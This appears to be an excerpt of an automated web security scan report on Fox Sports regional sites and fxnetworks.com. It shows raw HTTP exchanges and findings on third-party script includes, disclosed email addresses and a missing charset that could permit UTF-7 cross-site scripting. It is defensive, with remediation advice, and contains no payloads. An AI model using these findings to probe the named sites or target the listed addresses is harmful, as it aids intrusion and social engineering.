<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsohio/common/appjs/~1294849109/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~ugc/menz=1" type="text/javascript"></script> ...[SNIP]... </script> <script type="text/javascript" src="http://contentserv.brandaffinity.net/engagement/ice/ice.js?PID=00170-dN7hG-11111"></script> ...[SNIP]... <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script> <!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script> ...[SNIP]... <div id = "main_187"> <script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.ohio/main;tile=3;sz=300x250;ord=1294849863?" type="text/javascript"></script> ...[SNIP]... <!-- SiteCatalyst code version: H.17.. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com --> <script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsohio/common/js/omniture/s_code_analytics_fsn.js"></script> ...[SNIP]...
GET / HTTP/1.1 Host: www.foxsportssouth.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:08 GMT Server: Apache Set-Cookie: PHPSESSID=8fc384966e11984cdc4ff0ba62e6bda3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 87289
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html xmlns="http ...[SNIP]... </script>-->
<script language="javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US" type="text/javascript" language="javascript1.2"></script> <script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsouth/common/appjs/~1294847457/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~flashobject~ugc~flicker/menz=1" type="text/javascript"></script> ...[SNIP]... <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script> <!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.south/main;tile=3;sz=300x250;ord=1294849869?" type="text/javascript"></script> ...[SNIP]... <!-- SiteCatalyst code version: H.17.. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com --> <script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsouth/common/js/omniture/s_code_analytics_fsn.js"></script> ...[SNIP]...
GET /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html?blockID=389214&feedID=4354 HTTP/1.1 Host: www.foxsportssouth.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:23:29 GMT Server: Apache Set-Cookie: PHPSESSID=f9238600833496253f5dffcf1949b4ff; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 83915
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html xmlns="http ...[SNIP]... </script>-->
<script language="javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US" type="text/javascript" language="javascript1.2"></script> <script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsouth/common/appjs/~1294847457/s=main~thePlatform^swfobject~ugc~comment_box/menz=1" type="text/javascript"></script> ...[SNIP]... <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script> <!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.south/landing_bcstitle;tile=3;sz=728x90;ord=1294849839?" type="text/javascript"></script> ...[SNIP]... </a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.south/landing_bcstitle;tile=3;sz=300x250;ord=1294849839?" type="text/javascript"></script> ...[SNIP]... <div id = "right_newton_239">
<script src="http://widgets.twimg.com/j/2/widget.js"></script> ...[SNIP]... <!-- SiteCatalyst code version: H.17.. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com --> <script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsouth/common/js/omniture/s_code_analytics_fsn.js"></script> ...[SNIP]...
GET /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html HTTP/1.1 Host: www.foxsportssouth.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:08 GMT Server: Apache Set-Cookie: PHPSESSID=461568b0214c4c75495615da01f0b1e4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 71090
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html xmlns="http ...[SNIP]... </script>-->
<script language="javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US" type="text/javascript" language="javascript1.2"></script> <script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsouth/common/appjs/~1294847457/s=main~thePlatform^swfobject/menz=1" type="text/javascript"></script> ...[SNIP]... <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script> <!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.south/landing_bcstitle;tile=3;sz=728x90;ord=1294849869?" type="text/javascript"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.south/landing_bcstitle;tile=3;sz=300x250;ord=1294849869?" type="text/javascript"></script> ...[SNIP]... <div id = "right_newton_239">
<script src="http://widgets.twimg.com/j/2/widget.js"></script> ...[SNIP]... <!-- SiteCatalyst code version: H.17.. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com --> <script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsouth/common/js/omniture/s_code_analytics_fsn.js"></script> ...[SNIP]...
GET / HTTP/1.1 Host: www.foxsportssouthwest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:09 GMT Server: Apache Set-Cookie: PHPSESSID=7d9d4d196f8c57526962134428908ef5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 74557
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... </script>-->
<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxswes/common/appjs/~1294821171/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~ugc~flicker/menz=1" type="text/javascript"></script> ...[SNIP]... <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script> <!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script> ...[SNIP]... <div id = "main_187"> <script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.southwest/main;tile=3;sz=300x250;ord=1294849812?" type="text/javascript"></script> ...[SNIP]... <!-- SiteCatalyst code version: H.17.. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com --> <script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxswes/common/js/omniture/s_code_analytics_fsn.js"></script> ...[SNIP]...
The response dynamically includes the following script from another domain:
http://s7.addthis.com/js/250/addthis_widget.js
Request
GET / HTTP/1.1 Host: www.foxsportssupports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8233
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... </a> <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=foxsportssupports"></script> ...[SNIP]...
GET / HTTP/1.1 Host: www.foxsportstennessee.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:11 GMT Server: Apache Set-Cookie: PHPSESSID=452c8dd2904462f9015b783662923a87; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 68716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... orizontal_tabs_426~horizontal_tabs_623~custom_classes~component_masthead~component_feedtemplate_310~component_right_generic~component_footer/g=style~flicker/ucdn=1" rel="stylesheet" type="text/css" /> <script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxtenn/common/appjs/~1294847090/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~flashobject~ugc~flicker/menz=1" type="text/javascript"></script> ...[SNIP]... <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script> <!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script> ...[SNIP]... <div id = "main_187"> <script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.tennessee/main;tile=3;sz=300x250;ord=1294849831?" type="text/javascript"></script> ...[SNIP]... <!-- SiteCatalyst code version: H.17.. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com --> <script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxtenn/common/js/omniture/s_code_analytics_fsn.js"></script> ...[SNIP]...
GET /01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html?blockID=389566&feedID=3709 HTTP/1.1 Host: www.foxsportswest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:13 GMT Server: Apache Set-Cookie: PHPSESSID=5a10a35d0cd51561897895de30ab37c1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 79224
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... </script>-->
<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxwest/common/appjs/~1294822698/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~ugc~comment_box/menz=1" type="text/javascript"></script> ...[SNIP]... <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script> <!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.west/landing_witz;tile=3;sz=728x90;ord=1294849854?" type="text/javascript"></script> ...[SNIP]... </a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.west/landing_witz;tile=3;sz=300x250;ord=1294849854?" type="text/javascript"></script> ...[SNIP]... <!-- SiteCatalyst code version: H.17.. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com --> <script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxwest/common/js/omniture/s_code_analytics_fsn.js"></script> ...[SNIP]...
GET /01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html HTTP/1.1 Host: www.foxsportswest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:11 GMT Server: Apache Set-Cookie: PHPSESSID=52ba63048e530107d21cb80ac654b510; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 58751
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... </script>-->
<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxwest/common/appjs/~1294822698/s=main~thePlatform^swfobject/menz=1" type="text/javascript"></script> ...[SNIP]... <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script> <!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.west/landing_witz;tile=3;sz=728x90;ord=1294849871?" type="text/javascript"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.west/landing_witz;tile=3;sz=300x250;ord=1294849871?" type="text/javascript"></script> ...[SNIP]... <!-- SiteCatalyst code version: H.17.. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com --> <script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxwest/common/js/omniture/s_code_analytics_fsn.js"></script> ...[SNIP]...
GET / HTTP/1.1 Host: www.foxsportswisconsin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:16 GMT Server: Apache Set-Cookie: PHPSESSID=b346a6944b6aa67934f8452ef87105ed; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 74886
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... </script>-->
<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/fsswisc/common/appjs/~1294848286/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~ugc~flicker/menz=1" type="text/javascript"></script> ...[SNIP]... <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script> <!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script> ...[SNIP]... <div id = "main_187"> <script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.wisconsin/main;tile=3;sz=300x250;ord=1294849878?" type="text/javascript"></script> ...[SNIP]... <!-- SiteCatalyst code version: H.17.. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com --> <script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/fsswisc/common/js/omniture/s_code_analytics_fsn.js"></script> ...[SNIP]...
GET / HTTP/1.1 Host: www.fxnetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=UTF-8 Expires: Wed, 12 Jan 2011 16:31:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 12 Jan 2011 16:31:22 GMT Connection: close Connection: Transfer-Encoding Content-Length: 55710
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email address was disclosed in the response:
foxsportshouston@yahoo.com
Request
GET / HTTP/1.1 Host: www.foxsportshouston.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:56 GMT Server: Apache Set-Cookie: PHPSESSID=d3f0a37aad79eca82e7871d6bfdcad10; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 69986
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The following email address was disclosed in the response:
contactus-fso@foxsports.net
Request
GET / HTTP/1.1 Host: www.foxsportsohio.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:02 GMT Server: Apache Set-Cookie: PHPSESSID=090a220f00fee006a09844523813c3f9; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 78763
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The following email address was disclosed in the response:
user@fxnetworks.com
Request
GET / HTTP/1.1 Host: www.fxnetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=UTF-8 Expires: Wed, 12 Jan 2011 16:31:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 12 Jan 2011 16:31:22 GMT Connection: close Connection: Transfer-Encoding Content-Length: 55710
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
Request
GET / HTTP/1.1 Host: www.foxsportswest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:11 GMT Server: Apache Vary: Accept-Encoding Content-Length: 56 Connection: close Content-Type: text/html